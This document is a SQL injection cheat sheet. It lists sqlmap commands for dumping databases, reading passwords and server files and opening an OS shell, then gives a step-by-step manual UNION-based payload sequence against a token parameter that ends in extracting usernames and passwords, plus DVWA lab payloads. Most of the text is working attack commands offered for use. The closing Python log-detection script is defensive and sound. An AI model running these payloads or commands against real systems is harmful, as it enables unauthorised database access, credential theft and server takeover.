SQLMAP and Manual SQLi Commands
A-SQLMAP Commands-
Get Database-
sqlmap.py -u "website" --dbs --batch
Get Tables-
sqlmap.py -u "website" --tables -D acuart
Get Columns-
sqlmap.py -u "website" --columns -T users -D acuart
Dump Columns-
sqlmap.py -u "website" -D acuart -T users -C a,b,c,d --dump (replace a,b,c,d with the comma-separated column names)
Safe SQLMap run (request from file, lowest level/risk, single thread)-
sqlmap.py -r 1.txt --force-ssl --level=1 --risk=1 --threads=1 --dbms=PostgreSQL --technique=BEUSTQ
Dump All in One-
sqlmap.py -u "website" -D acuart --dump-all
B-Manual SQLi Commands-
Check for SQLi-
1-http://Target-IP/1.php?format1=json&token1=123456789'
{"status":401,"data":"No Data found with this provided token"}
Fixing the query (close the string, add a tautology, comment out the rest)-
1-http://Target-IP/1.php?format1=json&token1=123456789'+or'1'='1--+
{"status":200}
Getting the number of columns with ORDER BY-
2-http://Target-IP/1.php?format1=json&token1=123456789'+order+by+10--+
Getting the reflected (vulnerable) column-
5-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,2,3,4,5,6,7,8,9,10--+
Getting the DB Version-
6-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,@@version,3,4,5,6,7,8,9,10--+
Getting Table Names-
7-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables--+
Getting the tables of the current database-
8-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--+
Getting the Column Names-
9-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name='user'+and+table_schema=database()--+
Getting usernames and passwords from the user table-
10-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+user--+
**********************
SQLMap-
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=12345678 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u http://<IP> --dbms=mysql --crawl=3
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --technique=U --random-agent --dump
Scan the URL for union-based injection (technique U; add E for error-based) with a MySQL backend, use a random user agent and dump the database.
sqlmap -o -u "http://meh.com/form/" --forms
sqlmap check form for injection
sqlmap -o -u "http://xyz/vuln-form" --forms -D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.
sqlmap -u TARGET --flush-session
Flushes the session
sqlmap -u TARGET -p user --technique=B
Attempts to exploit the "user" parameter using the boolean-based blind technique (B).
sqlmap -r <captured request>
Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap automate everything. Add --os-shell at the end to pop a shell if possible.
DVWA-
Use --+ or # or ; as the comment terminator. char(117,115,101,114,115) is 'users' (the user table) spelled as ASCII codes, so no quotes are needed.
1. ?id=1' order by 1,2#
2. ?id=1' union select 1,2#
3. ?id=1' union select database(),version()#
4. ?id=1' union select 1,table_name from information_schema.tables#
5. ?id=1' union select 1,column_name from information_schema.columns where table_name=char(117,115,101,114,115)#
6. ?id=1' union select user,password from users#
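Seen from the defender's side, an added detection example (Python, not from this page or from sqlmap): it parses constructed Apache combined-format access-log lines carrying the payloads from both the manual section and the DVWA list, URL-decodes the query string and matches the indicators those payloads share (quote tautology, ORDER BY probe, UNION SELECT, information_schema enumeration, @@version or version(), group_concat, char() obfuscation, trailing comment), flags sqlmap's default User-Agent, which begins with sqlmap/ unless --random-agent replaces it, and marks any source that sends several such requests as a probable scanner. The lone quote probe from step 1 is deliberately not an indicator on its own, since legitimate values contain apostrophes. IPs, timestamps and the burst threshold are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Indicators drawn from the payloads on this page; all matching is done on the
# URL-decoded query string so "+" and %xx encoding cannot hide them.
SIGNATURES = {
    "quote_tautology":    re.compile(r"'\s*or\s*'", re.I),
    "order_by_probe":     re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":       re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "schema_enum":        re.compile(r"information_schema\.(tables|columns)", re.I),
    "version_probe":      re.compile(r"@@version|\bversion\(\)", re.I),
    "group_concat":       re.compile(r"group_concat\(", re.I),
    "char_obfuscation":   re.compile(r"\bchar\(\d+(,\d+)+\)", re.I),
    "comment_terminator": re.compile(r"(--|#)\s*$"),
}
# sqlmap identifies itself by User-Agent unless run with --random-agent.
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)

# Apache combined log format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def analyse_line(line):
    """Return ip, status, path and the list of matched indicator names (None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = unquote_plus(parts.query)
    reasons = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if SQLMAP_UA.search(m.group("ua")):
        reasons.append("sqlmap_user_agent")
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "path": parts.path, "reasons": reasons}

def scan(lines, burst_threshold=3):
    """Flag every suspicious request and every source that sent burst_threshold or more."""
    hits = [r for r in map(analyse_line, lines) if r and r["reasons"]]
    per_ip = Counter(h["ip"] for h in hits)
    scanners = sorted(ip for ip, n in per_ip.items() if n >= burst_threshold)
    return {"hits": hits, "per_ip": dict(per_ip), "probable_scanners": scanners}

# Constructed sample log: one legitimate lookup, the page's manual probe sequence,
# a DVWA-style request, and a scan announcing itself through the default UA.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:30 +0000] "GET /1.php?format1=json&token1=987654321 HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /1.php?format1=json&token1=123456789%27 HTTP/1.1" 401 58 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /1.php?format1=json&token1=123456789%27+or%271%27%3D%271--+ HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /1.php?format1=json&token1=123456789%27+order+by+10--+ HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /1.php?format1=json&token1=123456789%27+union+all+select+1,@@version,3--+ HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /1.php?format1=json&token1=123456789%27+union+all+select+1,group_concat(table_name),3+from+information_schema.tables--+ HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:14:02:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+union+select+1,column_name+from+information_schema.columns+where+table_name%3Dchar(117,115,101,114,115)%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:14:10:02 +0000] "GET /meh.php?id=1 HTTP/1.1" 200 120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
]

if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for hit in result["hits"]:
        print(hit["ip"], hit["status"], hit["path"], ", ".join(hit["reasons"]))
    print("probable scanners:", result["probable_scanners"])
```

In production the decoded-query matching belongs in the WAF or the log pipeline rather than a script, and the status sequence the page documents (401 on the quote probe, then 200 on the tautology from the same source) is itself worth an alert even when every individual request looks harmless.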